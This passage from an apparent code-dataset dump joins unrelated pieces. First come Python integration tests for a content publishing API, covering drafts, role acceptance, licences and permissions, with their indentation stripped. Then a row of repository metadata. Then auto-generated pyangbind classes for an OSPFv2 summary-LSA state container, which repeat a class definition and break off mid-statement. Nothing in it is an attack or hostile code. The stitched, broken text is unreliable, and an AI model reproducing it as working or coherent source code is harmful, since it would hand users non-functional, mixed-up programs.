self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
def test_publish_as_author(self):
author_id = 'cnxcap'
# Post a page.
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'content': '<html><body><p>Content of page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}, status=201)
page1 = response.json
self.assert_cors_headers(response)
# Put an author on.
page1['authors'].append({'id': author_id, 'type': 'cnx-id'})
response = self.testapp.put_json('/contents/{}@draft.json'
.format(page1['id']), page1)
page1 = response.json
self.logout()
# Login as the author to accept the role and publish.
self.login(author_id)
self.testapp.post_json('/contents/{}@draft/acceptance'
.format(page1['id']),
{'license': True,
'roles': [{'role': 'authors',
'hasAccepted': True}]})
post_data = {
'submitlog': 'Publishing a page as an author is working?',
'items': (page1['id'],),
}
response = self.testapp.post_json('/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {page1['id']: '{}@1'.format(page1['id'])}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
url = '/contents/{}@draft.json'.format(page1['id'])
response = self.testapp.get(url)
self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
def test_publish_binder_w_printStyle(self):
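        # Same flow as test_publish_binder, but the pages carry a printStyle
        # attribute.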
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'content': '<html><body><p>Content of page one</p></body></html>',
'abstract': 'Learn how to etc etc',
'printStyle': '*PDF Print Style*',
}, status=201)
page1 = response.json
self.assert_cors_headers(response)
response = self.testapp.post_json('/users/contents', {
'title': 'Page two',
'content': '<html><body><p>Content of page two</p></body></html>',
'printStyle': '[PDF Print Style]',
'abstract': 'need one'
}, status=201)
page2 = response.json
self.assert_cors_headers(response)
page1_str = '{}@draft'.format(page1['id'])
page2_str = '{}@draft'.format(page2['id'])
response = self.testapp.post_json(
'/users/contents',
{
'title': 'Book',
'abstract': 'Book abstract',
'language': 'de',
'mediaType': 'application/vnd.org.cnx.collection',
'tree': {
'contents': [
{
'id': page1_str,
'title': 'Page one',
},
{
'id': 'subcol',
'title': 'New section',
'contents': [
{
'id': page2_str,
'title': 'Page two',
},
],
},
],
},
}, status=201)
self.assert_cors_headers(response)
binder = response.json
post_data = {
'submitlog': 'Publishing a book is working?',
'items': (binder['id'], page1['id'], page2['id'],),
}
response = self.testapp.post_json('/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {
binder['id']: '{}@1.1'.format(binder['id']),
page1['id']: '{}@1'.format(page1['id']),
page2['id']: '{}@1'.format(page2['id']),
}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
for page in (binder, page1, page2,):
url = '/contents/{}@draft.json'.format(page['id'])
response = self.testapp.get(url)
self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
def test_publish_derived_from_binder(self):
self.logout()
# Create a derived binder
self.login('e5a07af6-09b9-4b74-aa7a-b7510bee90b8')
post_data = {
'derivedFrom': u'e79ffde3-7fb4-4af3-9ec8-df648b391597@6.1',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
binder = response.json
self.assert_cors_headers(response)
# Publish the derived binder
post_data = {
'submitlog': 'Publishing a derived book',
'items': [
binder['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
self.assert_cors_headers(response)
publication_info = response.json
publication_id = publication_info['publication']
self.assertEqual(publication_info['state'], 'Waiting for moderation')
self.assertEqual(publication_info['mapping'][binder['id']],
'{}@1.1'.format(binder['id']))
response = self.testapp.get(
'/contents/{}@draft.json'.format(binder['id']))
result = response.json
self.assertEqual(result['state'], 'Waiting for moderation')
self.assertEqual(result['publication'], unicode(publication_id))
def test_publish_revision_single_page(self):
id = '91cb5f28-2b8a-4324-9373-dac1d617bc24'
# If the content already exists, because of other tests, remove it.
from ..storage import storage
document = storage.get(id=id)
if document is not None:
storage.remove(document)
storage.persist()
self.logout()
# Create the revision
self.login('Rasmus1975')
post_data = {
'id': u'91cb5f28-2b8a-4324-9373-dac1d617bc24@1',
'title': u'Turning DNA through resonance',
'abstract': u'Theories on turning DNA structures',
'language': u'en',
'subjects': [u'Science and Technology'],
'keywords': [u'DNA', u'resonance'],
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
self.assert_cors_headers(response)
page = response.json
# Publish the revision
post_data = {
'submitlog': 'Publishing a revision',
'items': [
page['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
publication_info = response.json
self.assertEqual(publication_info['state'], 'Done/Success')
self.assertEqual(publication_info['mapping'][page['id']],
'{}@2'.format(page['id']))
def test_edit_after_publish(self):
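        # After a successful publication, posting with the published id
        # creates (or returns) a new draft, which can then be published as
        # the next version (@2).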
# create a new page
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page_one['id'])])
# authoring should have the document in the db with status
# "Done/Success"
response = self.testapp.get('/contents/{}@draft.json'.format(
page_one['id']), status=200)
body = response.json
self.assertEqual(body['state'], 'Done/Success')
# editing the content again
post_data = {
'id': '{}@1'.format(page_one['id']),
'title': 'Page one v2',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
self.assertEqual(page_one['state'], 'Draft')
# post with the same id should return the same draft
post_data = {
'id': '{}@1'.format(page_one['id']),
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
self.assertEqual(page_one['state'], 'Draft')
self.assertEqual(page_one['title'], 'Page one v2')
# publish the next version
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@2'.format(page_one['id'])])
def test_delete_after_publish(self):
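        # A draft can be deleted from authoring after it has been published.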
# create a new page
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page_one['id'])])
# authoring should have the document in the db with status
# "Done/Success"
response = self.testapp.get('/contents/{}@draft.json'.format(
page_one['id']), status=200)
body = response.json
self.assertEqual(body['state'], 'Done/Success')
# delete the content from authoring
response = self.testapp.delete(
'/contents/{}@1'.format(page_one['id']), post_data, status=200)
self.testapp.get('/contents/{}@1'.format(page_one['id']), status=404)
def test_publish_after_error(self):
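        # A publish failure (invalid image reference) leaves the draft in the
        # "Failed/Error" state; after fixing the content the draft can be
        # published successfully.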
# create a new page
post_data = {
'title': 'Page one',
'content': '<html><body><p><img src="a.png" /></p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page_one = response.json
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
self.assertEqual(response.status, '400 Bad Request')
self.assertEqual(response._headers['publish_state'], 'Failed/Error')
self.assertEqual(response._headers['error_type'], 'InvalidReference')
# authoring should have the document in the db with status
# "Failed/Error"
response = self.testapp.get('/contents/{}@draft.json'.format(
page_one['id']), status=200)
body = response.json
self.assertEqual(body['state'], 'Failed/Error')
# fix up the invalid reference
post_data = {
'id': '{}'.format(page_one['id']),
'title': 'Page one v2',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page_one['id']), post_data)
page_one = response.json
self.assertEqual(page_one['state'], 'Draft')
# publish again
post_data = {
'submitlog': u'Nueva versión!',
'items': [
page_one['id'],
],
}
response = self.testapp.post_json(
'/publish', post_data, expect_errors=True)
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page_one['id'])])
def test_publish_w_multiple_users(self):
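        # With an additional editor, the first publish waits for role
        # acceptance; once the editor accepts, a second publish succeeds.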
# create a new page
post_data = {
'title': 'Page one',
'content': '<html><body><p>Contents of Page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
# add an editor
post_data = {
'editors': [{'id': 'user2'}],
}
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), post_data,
status=200)
# edit some more
post_data = {
'title': 'Page one with an editor',
}
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), post_data,
status=200)
post_data = {
'submitlog': u'Nueva versión!',
'items': [page['id']],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
# publication should be waiting for acceptance
publish = response.json
self.assertEqual(publish['state'], 'Waiting for acceptance')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page['id'])])
# login as user2 and accept roles
self.logout()
self.login('user2')
post_data = {
'license': True,
'roles': [{'role': 'editors', 'hasAccepted': True}],
}
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
# publish the content again
self.logout()
self.login('user1')
post_data = {
'submitlog': u'Nueva versión!',
'items': [page['id']],
}
response = self.testapp.post_json(
'/publish', post_data, status=200)
        # with all roles accepted, the publication should now succeed
publish = response.json
self.assertEqual(publish['state'], 'Done/Success')
self.assertEqual(list(publish['mapping'].values()),
['{}@1'.format(page['id'])])
def test_acceptance(self):
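        # Exercise the role acceptance endpoint: the creator's roles are
        # accepted automatically, other users see only their own pending
        # roles, and rejecting all roles removes edit (but not view) access.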
# create a new page
post_data = {
'title': 'My Page',
}
created = datetime.datetime.now(TZINFO)
formatted_created = created.astimezone(TZINFO).isoformat()
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = created
response = self.testapp.post_json(
'/users/contents', post_data, status=201)
page = response.json
# user1 has accepted all their roles
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user1',
u'roles': [{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'authors'},
{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'copyright_holders'},
{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'publishers'}],
})
# add user2 to authors and editors, add user1 to editors, add user3 to
# translators, licensors and publishers, add user4 to translators
post_data = {
'authors': page['authors'] + [{'id': 'user2'}],
'editors': page['editors'] + [{'id': 'user1'}, {'id': 'user2'}],
'translators': page['translators'] +
[{'id': 'user3'}, {'id': 'user4'}],
'licensors': page['licensors'] + [{'id': 'user3'}],
'publishers': page['publishers'] + [{'id': 'user3'}],
}
now = datetime.datetime.now(TZINFO)
formatted_now = now.astimezone(TZINFO).isoformat()
with mock.patch('datetime.datetime') as mock_datetime:
mock_datetime.now.return_value = now
response = self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), post_data,
status=200)
page = response.json
# user1 should accept the editor role automatically
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user1',
u'roles': [{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'authors'},
{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'copyright_holders'},
{u'assignmentDate': formatted_now,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'editors'},
{u'assignmentDate': formatted_created,
u'hasAccepted': True,
u'requester': u'user1',
u'role': u'publishers'}],
})
# log in as user2
self.logout()
self.login('user2')
# user2 should have authors and editors in acceptance info
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user2',
u'roles': [{u'role': u'authors',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None},
{u'role': u'editors',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None}],
})
# user2 accepts the roles
post_data = {
'license': True,
'roles': [{'role': 'editors', 'hasAccepted': True},
{'role': 'authors', 'hasAccepted': True}],
}
self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
        # check the acceptance info again (all roles accepted)
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user2',
u'roles': [{u'role': u'authors',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': True},
{u'role': u'editors',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': True}],
})
# login as user3
self.logout()
self.login('user3')
# user3 should have translators, licensors and publishers in the
# acceptance info
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user3',
u'roles': [{u'role': u'copyright_holders',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None},
{u'role': u'publishers',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None},
{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None}],
})
# user3 rejects their roles
post_data = {
'license': False,
'roles': [{'role': 'translators', 'hasAccepted': False},
{'role': 'copyright_holders', 'hasAccepted': False},
{'role': 'publishers', 'hasAccepted': False}],
}
response = self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
# check the acceptance info for user3 again
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance['roles'], [
{u'role': u'copyright_holders',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False},
{u'role': u'publishers',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False},
{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False}])
# user3 should still be able to view the content, but not edit
self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), {}, status=403)
# user3 changes their mind and accepts one of their roles
post_data = {
'license': True,
'roles': [{'role': 'copyright_holders', 'hasAccepted': True}],
}
response = self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
# check the acceptance info for user3 again
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance['roles'], [
{u'role': u'copyright_holders',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': True},
{u'role': u'publishers',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False},
{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': False}])
# user3 should be able to view and edit the content
self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
self.testapp.get(
'/contents/{}@draft.json'.format(page['id']))
self.testapp.put_json(
'/contents/{}@draft.json'.format(page['id']), {})
# content should be in the workspace
response = self.testapp.get('/users/contents')
workspace = response.json
content_ids = [i['id'] for i in workspace['results']['items']]
self.assertIn('{}@draft'.format(page['id']), content_ids)
# login as user4
self.logout()
self.login('user4')
# user4 should have translators in the acceptance info
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user4',
u'roles': [{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None}],
})
# user4 accepts their roles without accepting the license
post_data = {
'license': False,
'roles': [{'role': 'translators', 'hasAccepted': True}],
}
response = self.testapp.post_json(
'/contents/{}@draft/acceptance'.format(page['id']),
post_data, status=200)
        # because the license was not accepted, the role acceptance is reset
        # to pending
response = self.testapp.get(
'/contents/{}@draft/acceptance'.format(page['id']))
acceptance = response.json
self.assertEqual(acceptance, {
u'license': {
u'url': u'http://creativecommons.org/licenses/by/4.0/',
u'name': u'Creative Commons Attribution License',
u'code': u'by',
u'version': u'4.0',
},
u'url': u'http://localhost/contents/{}%40draft.json'.format(
page['id']),
u'id': page['id'],
u'title': u'My Page',
u'user': u'user4',
u'roles': [{u'role': u'translators',
u'assignmentDate': formatted_now,
u'requester': u'user1',
u'hasAccepted': None}],
})
def test_publish_w_changed_license(self):
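        # Publish with an explicit license change to by-nc-sa: missing or
        # invalid license urls are rejected, and the new license is recorded
        # in authoring, publishing and archive.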
author_id = 'cnxcap'
# Post a page.
response = self.testapp.post_json('/users/contents', {
'title': 'Page one',
'content': '<html><body><p>Content of page one</p></body></html>',
'abstract': 'Learn how to etc etc',
}, status=201)
page1 = response.json
self.assert_cors_headers(response)
# Put an author on.
page1['authors'].append({'id': author_id, 'type': 'cnx-id'})
response = self.testapp.put_json('/contents/{}@draft.json'
.format(page1['id']), page1)
page1 = response.json
self.logout()
# Login as the author to accept the role and publish.
self.login(author_id)
self.testapp.post_json('/contents/{}@draft/acceptance'
.format(page1['id']),
{'license': True,
'roles': [{'role': 'authors',
'hasAccepted': True}]})
# Prepare the post data
from ..models import LICENSES
license = [l for l in LICENSES if l.code == 'by-nc-sa'][0]
post_data = {
'submitlog': 'Publishing a page as an author is working?',
'items': (page1['id'],),
'license': license.__json__(),
}
# Try to publish with a missing license url.
missing_info_post_data = deepcopy(post_data)
del missing_info_post_data['license']['url']
response = self.testapp.post_json('/publish', missing_info_post_data,
status=400)
self.assertIn("Missing license url", response.body)
# Try to publish with an invalid license.
invalid_post_data = deepcopy(post_data)
agpl_license_url = 'https://www.gnu.org/licenses/agpl-3.0'
invalid_post_data['license']['url'] = agpl_license_url
response = self.testapp.post_json('/publish', invalid_post_data,
status=400)
self.assertIn("Invalid license url", response.body)
# Publish under license by-nc-sa.
response = self.testapp.post_json('/publish', post_data, status=200)
self.assertEqual(response.json[u'state'], u'Done/Success')
expected_mapping = {page1['id']: '{}@1'.format(page1['id'])}
self.assertEqual(response.json[u'mapping'], expected_mapping)
self.assert_cors_headers(response)
# Grab the publication id for followup assertions.
publication_id = response.json['publication']
url = '/contents/{}@draft.json'.format(page1['id'])
response = self.testapp.get(url)
self.assertEqual(response.json['state'], 'Done/Success')
self.assertEqual(response.json['publication'],
str(publication_id))
self.assertEqual(response.json['license']['url'], license.url)
# Check publishing for the correct license and acceptance.
publishing_host = integration_test_settings()['publishing.url']
url = '/contents/{}/licensors'.format(page1['id'])
url = urljoin(publishing_host, url)
response = requests.get(url)
self.assertEqual(response.json()['license_url'], license.url)
self.assertEqual(
[l['has_accepted'] for l in response.json()['licensors']],
[True, True]
)
# Check archive for the correct license
archive_host = integration_test_settings()['archive.url']
url = '/contents/{}@1.json'.format(page1['id'])
url = urljoin(archive_host, url)
response = requests.get(url)
self.assertEqual(response.json()['license']['url'], license.url)
|
agpl-3.0
| 2,964,078,937,698,059,000
| 39.794775
| 121
| 0.510653
| false
| 4.054667
| true
| false
| false
|
napalm-automation/napalm-yang
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/__init__.py
|
1
|
20811
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/summary-lsa/types-of-service/type-of-service/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Per-TOS parameters for the LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__tos", "__metric")
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__tos = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"summary-lsa",
"types-of-service",
"type-of-service",
"state",
]
def _get_tos(self):
"""
Getter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/tos (uint8)
YANG Description: OSPF encoding of the type of service referred to by this
LSA. Encoding for OSPF TOS are described in RFC2328.
"""
return self.__tos
def _set_tos(self, v, load=False):
"""
Setter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/tos (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_tos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tos() directly.
YANG Description: OSPF encoding of the type of service referred to by this
LSA. Encoding for OSPF TOS are described in RFC2328.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """tos must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__tos = t
if hasattr(self, "_set"):
self._set()
def _unset_tos(self):
self.__tos = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric)
YANG Description: The metric value to be used for the TOS specified. This value
represents the cost of use of the link for the specific type
of service.
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The metric value to be used for the TOS specified. This value
represents the cost of use of the link for the specific type
of service.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""",
"defined-type": "oc-ospf-types:ospf-metric",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', is_config=False)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
tos = __builtin__.property(_get_tos)
metric = __builtin__.property(_get_metric)
_pyangbind_elements = OrderedDict([("tos", tos), ("metric", metric)])
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/summary-lsa/types-of-service/type-of-service/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Per-TOS parameters for the LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__tos", "__metric")
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__tos = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
self.__metric = YANGDynClass(
